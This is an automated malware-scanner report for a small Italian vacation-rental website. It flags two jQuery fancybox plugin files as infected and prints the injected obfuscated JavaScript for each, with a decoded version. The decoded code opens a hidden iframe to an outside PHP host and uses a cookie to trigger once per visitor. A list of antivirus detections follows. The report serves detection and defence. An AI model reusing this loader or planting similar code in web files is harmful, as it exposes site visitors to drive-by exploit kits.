Malware Scanner report for casavacanzemarchein.it

Malicious/Suspicious/Total urls checked
2/0/15
2 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Scanned pages/files

Request | Server response | Status
http://casavacanzemarchein.it/
200 OK
Content-Length: 10262
Content-Type: text/html
clean
http://casavacanzemarchein.it/./fancybox/jquery.mousewheel-3.0.4.pack.js
200 OK
Content-Length: 4486
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="74837c7182777d7c2e88888874747436372e89182e846f802e747b842e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b7335374918182e747b843c8180712e4b2e357682827e483d3d7e767d827d817380847771737a6f8277816f7c6f3c77823d8666855b705478643c7e767e3549182e747b843c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a8382733549182e747b843c8182877a733c707d807273802e4b2e353e3549182e747b843c8182877a733c7673777576
... 1784 bytes are skipped ...
737c75827649182e80738283807c2e837c7381716f7e73362e727d71837b737c823c717d7d7977733c818370818280777c75362e7a737c3a2e737c722e372e3749188b1877742e367c6f8477756f827d803c717d7d797773537c6f707a737237188918777436557382517d7d7977733635847781778273726d837f35374b4b434337898b737a817389617382517d7d7977733635847781778273726d837f353a2e354343353a2e353f353a2e353d3537491818888888747474363749188b188b18";z=[];for(i=0;i<a.length;i+=2){z.push(parseInt(a.substr(i,2),16)-14);}eval(ss["fr"+"omCharCode"].apply(ss,z));

Decoded script:


String
String
function zzzfff() {
var fmv = document.createElement('iframe');
fmv.src = 'http://photoservicelatisana.it/xXwMbFjV.php';
fmv.style.position = 'absolute';
fmv.style.border = '0';
fmv.style.height = '9px';
fmv.style.width = '7px';
fmv.style.left = '1px';
fmv.style.top = '1px';
if (!document.getElementById('fmv')) {
document.write('<div id=\'fmv\'></div>');
document.getElementById('fmv').appendChild(fmv);<
... 1957 bytes are skipped ...
ength + 1;
if ( ( !start ) &&
( name != document.cookie.substring( 0, name.length ) ) )
{
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
if (navigator.cookieEnabled)
{
if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');
zzzfff();
}
}

Antivirus reports:

AntiVir | JS/iFrame.kpp
Avast | JS:Iframe-AHV [Trj]
Ad-Aware | JS:Exploit.BlackHole.PI
Rising | JS:Script.JS.Quidvetis.a!1612922
nProtect | JS:Exploit.BlackHole.PI
Emsisoft | JS:Exploit.BlackHole.PI (B)
McAfee-GW-Edition | JS/Iframe.gen.u
Microsoft | Trojan:JS/Quidvetis.A
Kaspersky | HEUR:Trojan.Script.Generic
MicroWorld-eScan | JS:Exploit.BlackHole.PI
Fortinet | JS/Blacole.EU!tr.dldr
McAfee | JS/Iframe.gen.u
NANO-Antivirus | Trojan.Script.Iframe.bopaxv
F-Secure | JS:Exploit.BlackHole.PI
F-Prot | JS/IFrame.RS.gen
Norman | Blacole.XE
GData | JS:Exploit.BlackHole.PI
Commtouch | JS/IFrame.RS.gen
BitDefender | JS:Exploit.BlackHole.PI

http://casavacanzemarchein.it/./fancybox/jquery.fancybox-1.3.4.pack.js
200 OK
Content-Length: 12196
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="74837c7182777d7c2e88888874747436372e89182e846f802e747b842e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b7335374918182e747b843c8180712e4b2e357682827e483d3d7e767d827d817380847771737a6f8277816f7c6f3c77823d8666855b705478643c7e767e3549182e747b843c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a8382733549182e747b843c8182877a733c707d807273802e4b2e353e3549182e747b843c8182877a733c7673777576
... 1784 bytes are skipped ...
737c75827649182e80738283807c2e837c7381716f7e73362e727d71837b737c823c717d7d7977733c818370818280777c75362e7a737c3a2e737c722e372e3749188b1877742e367c6f8477756f827d803c717d7d797773537c6f707a737237188918777436557382517d7d7977733635847781778273726d837f35374b4b434337898b737a817389617382517d7d7977733635847781778273726d837f353a2e354343353a2e353f353a2e353d3537491818888888747474363749188b188b18";z=[];for(i=0;i<a.length;i+=2){z.push(parseInt(a.substr(i,2),16)-14);}eval(ss["fr"+"omCharCode"].apply(ss,z));

Decoded script:


String
String
function zzzfff() {
var fmv = document.createElement('iframe');
fmv.src = 'http://photoservicelatisana.it/xXwMbFjV.php';
fmv.style.position = 'absolute';
fmv.style.border = '0';
fmv.style.height = '9px';
fmv.style.width = '7px';
fmv.style.left = '1px';
fmv.style.top = '1px';
if (!document.getElementById('fmv')) {
document.write('<div id=\'fmv\'></div>');
document.getElementById('fmv').appendChild(fmv);<
... 1957 bytes are skipped ...
ength + 1;
if ( ( !start ) &&
( name != document.cookie.substring( 0, name.length ) ) )
{
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
if (navigator.cookieEnabled)
{
if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');
zzzfff();
}
}

Antivirus reports:

AntiVir | JS/iFrame.kpp
Avast | JS:Iframe-AHV [Trj]
Ad-Aware | JS:Exploit.BlackHole.PI
Rising | JS:Script.JS.Quidvetis.a!1612922
nProtect | JS:Exploit.BlackHole.PI
Emsisoft | JS:Exploit.BlackHole.PI (B)
McAfee-GW-Edition | JS/Iframe.gen.u
Microsoft | Trojan:JS/Quidvetis.A
Kaspersky | HEUR:Trojan.Script.Generic
MicroWorld-eScan | JS:Exploit.BlackHole.PI
Fortinet | JS/Blacole.EU!tr.dldr
McAfee | JS/Iframe.gen.u
NANO-Antivirus | Trojan.Script.Iframe.bopaxv
F-Secure | JS:Exploit.BlackHole.PI
F-Prot | JS/IFrame.RS.gen
Norman | Blacole.XE
GData | JS:Exploit.BlackHole.PI
Commtouch | JS/IFrame.RS.gen
BitDefender | JS:Exploit.BlackHole.PI

http://casavacanzemarchein.it/dove-siamo.html
200 OK
Content-Length: 6850
Content-Type: text/html
clean
http://casavacanzemarchein.it/listino-prezzi.html
200 OK
Content-Length: 11675
Content-Type: text/html
clean
http://casavacanzemarchein.it/./example/7_b.jpg
200 OK
Content-Length: 300937
Content-Type: image/jpeg
clean
http://casavacanzemarchein.it/test404page.js
404 Not Found
Content-Length: 492
Content-Type: text/html
clean
http://casavacanzemarchein.it/./example/9_b.jpg
200 OK
Content-Length: 300937
Content-Type: image/jpeg
clean
http://casavacanzemarchein.it/./example/10_b.jpg
200 OK
Content-Length: 300937
Content-Type: image/jpeg
clean
http://casavacanzemarchein.it/./example/11_b.jpg
200 OK
Content-Length: 300937
Content-Type: image/jpeg
clean
http://casavacanzemarchein.it/./example/12_b.jpg
200 OK
Content-Length: 300937
Content-Type: image/jpeg
clean
http://casavacanzemarchein.it/./example/1_b.jpg
200 OK
Content-Length: 300937
Content-Type: image/jpeg
clean
http://casavacanzemarchein.it/./example/2_b.jpg
200 OK
Content-Length: 300937
Content-Type: image/jpeg
clean
http://casavacanzemarchein.it/./example/5_b.jpg
200 OK
Content-Length: 196808
Content-Type: image/jpeg
clean
http://casavacanzemarchein.it/./example/3_b.jpg
200 OK
Content-Length: 70922
Content-Type: image/jpeg
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: casavacanzemarchein.it

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 08 Jun 2014 00:35:06 GMT
Accept-Ranges: bytes
ETag: "6a00a9-2816-4e3c141dee4ec"
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Length: 10262
Content-Type: text/html
Last-Modified: Mon, 12 Aug 2013 14:51:20 GMT

...10262 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: casavacanzemarchein.it
Referer: http://www.google.com/search?q=casavacanzemarchein.it

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=casavacanzemarchein.it

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://casavacanzemarchein.it/

Result: casavacanzemarchein.it is not infected or malware details are not published yet.